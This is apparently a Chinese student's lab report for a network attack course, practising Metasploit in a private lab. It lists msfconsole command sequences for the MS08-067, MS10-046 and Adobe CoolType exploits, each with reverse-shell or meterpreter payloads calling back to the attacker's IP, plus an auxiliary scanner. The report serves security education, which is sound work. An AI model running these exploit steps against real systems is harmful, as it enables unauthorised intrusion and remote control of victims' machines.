2018-2019-2 20165209 《網絡對抗技術》Exp5:MSF基礎應用
2018-2019-2 20165209 《網絡對抗技術》Exp5:MSF基礎應用
目錄
- 一、基礎問題回答和實驗內容
- 二、攻擊實例
- 主動攻擊的實踐
ms08_067
payload/generic/shell_reverse_tcp
- 攻擊瀏覽器的實踐
ms10_046
windows/meterpreter/reverse_tcp
- 攻擊客戶端的實踐
Adobe
- 成功應用一個輔助模塊
scanner/steam/server_info
(唯一)
- 主動攻擊的實踐
- 三、實驗中遇到的問題及解決方案
- 四、實驗總結
一、基礎問題回答和實驗內容
1.基礎問題回答
用自己的話解釋什麽是exploit,payload,encode.
exploit:漏洞攻擊,一個exploit程序肯定會觸發系統的一個或多個漏洞,進而程序直接獲取到目標系統的部分或所有權限。
payload:搞破壞的關鍵代碼。
encode:保證payload不出現特定字符,避免被查殺。
實驗內容
任務一:一個主動攻擊實踐,如ms08_067。
任務二: 一個針對瀏覽器的攻擊,如ms11_050。
任務三: 一個針對客戶端的攻擊,如Adobe。
任務四: 成功應用任何一個輔助模塊。
返回目錄
二、攻擊實例
1.主動攻擊實踐,實現ms08_067
靶機:Microsoft Windows 2000(192.168.1.218)
payload :generic/shell_reverse_tcp
實驗步驟
==首先要把靶機和攻擊者的連接方式都改為橋接!!==
- 輸入
msfconsole
打開metasploit控制臺 - 輸入
use exploit/windows/smb/ms08_067_netapi
使用ms08_067漏洞攻擊方式
- 輸入
set payload generic/shell_reverse_tcp
以shell反向tcp連接為有效載荷 - 輸入
set RHOST 192.168.1.218
ip為靶機的IP - 輸入
set LHOST 192.168.1.182
ip為攻擊者的IP - 輸入
set target 0
設置目標,0為無差別攻擊 輸入
exploit
開始攻擊
返回目錄
攻擊瀏覽器實踐,ms10_046漏洞攻擊
靶機:Microsoft Windows XP SP3(English)
payload :windows/meterpreter/reverse_tcp
實驗步驟
- 輸入
use exploit/windows/browser/ms10_046_shortcut_icon_dllloader
使用瀏覽器漏洞
- 輸入
set payload windows/meterpreter/reverse_tcp
選擇反向鏈接載荷 - 輸入
set SRVHOST 192.168.1.182
設置服務器IP(攻擊者IP) - 輸入
set LHOST 192.168.1.182
設置攻擊者IP - 輸入
exploit
開始攻擊
- 在win xp sp3的瀏覽器中訪問剛剛設置的服務器IP
http://192.168.1.182
彈出如下窗口
- 同時攻擊者會開始監聽並與靶機建立連接。
輸入
sessions
查看有多少主機被反向鏈接到攻擊者和靶機對應的序號。輸入
sessions -i 2
控制靶機(-i後面的數即為靶機對應的序號)
返回目錄
攻擊客戶端實踐,實現Adobe
靶機:Windows XP sp3(192.168.1.139)
實驗步驟
- 輸入
use windows/fileformat/adobe_cooltype_sing
使用漏洞 - 輸入
set payload windows/meterpreter/reverse_tcp
選擇攻擊載荷 - 輸入
set LHOST 192.168.1.182
為攻擊者IP - 輸入
set FILENAME 20165209.pdf
設置生成pdf文件的文件名 - 輸入
exploit
開始攻擊
- 將生成的
20165209.pdf
復制到Windows XP中 - 輸入
back
退出當前模塊 - 輸入
use exploit/multi/handler
進入監聽模塊 - 輸入
set payload windows/meterpreter/reverse_tcp
選擇攻擊載荷 - 輸入
set LHOST 192.168.1.182
為攻擊者IP - 輸入
exploit
開始攻擊 - 在靶機中打開
20165209.pdf
,攻擊成功
返回目錄
成功攻擊一個輔助模塊,實現網段掃描(唯一)
靶機:
實驗步驟
- 輸入
show auxiliary
查看所有的輔助模塊 - 輸入
info scanner/steam/server_info
查看模塊信息,請求從服務器獲取信息,掃描範圍默認為10(從起始地址開始往後掃10個),端口固定為UDP端口27015。端口27015只是用作輸入/輸出的通信端口。
- 輸入
use scanner/steam/server_info
使用漏洞 - 輸入
set RHOSTS 192.168.1.180
為起始IP - 輸入
exploit
開始攻擊
(果不其然,這個網段裏木有服務器,sang~)
返回目錄
三、實驗中遇到的問題及解決方案
1.armitage無法開啟,出現錯誤提示如下圖
- 參考了一篇博客裏面解釋了很多,具體的操作如下
1 輸入 /etc/init.d/postgresql?start 啟動postgresql數據庫;
2 輸入 msfdb?init 初始化MSF數據庫(關鍵步驟);
3 輸入 msfconsole 運行msfconsole;
#4 輸入 db_status 在msf中查看數據庫連接狀態。
- 在顯示
Connected to msf. Connection type: postgresql.
之後,再次輸入armitage即可開啟成功。
返回目錄
四、實驗總結
1.實驗總結與體會
實驗最痛苦的就是明明和大家做的一樣,但是我的就是無法攻擊成功。通過實驗掌握了msf的簡單操作,始終牢記不懂就help,不知道是幹什麽的就info,看不懂就有道的宗旨,還是有些收獲的,有些快樂。
2.離實戰還缺些什麽技術
覺得差的也不多,也就一個大神的距離吧。通過在網絡上捕包反查IP,並且攻擊。類似這種步驟中的功能,我目前只能在已知的情況下,進行強迫式攻擊(就是硬生生讓舍友拷一下)。
返回目錄
2018-2019-2 20165209 《網絡對抗技術》Exp5:MSF基礎應用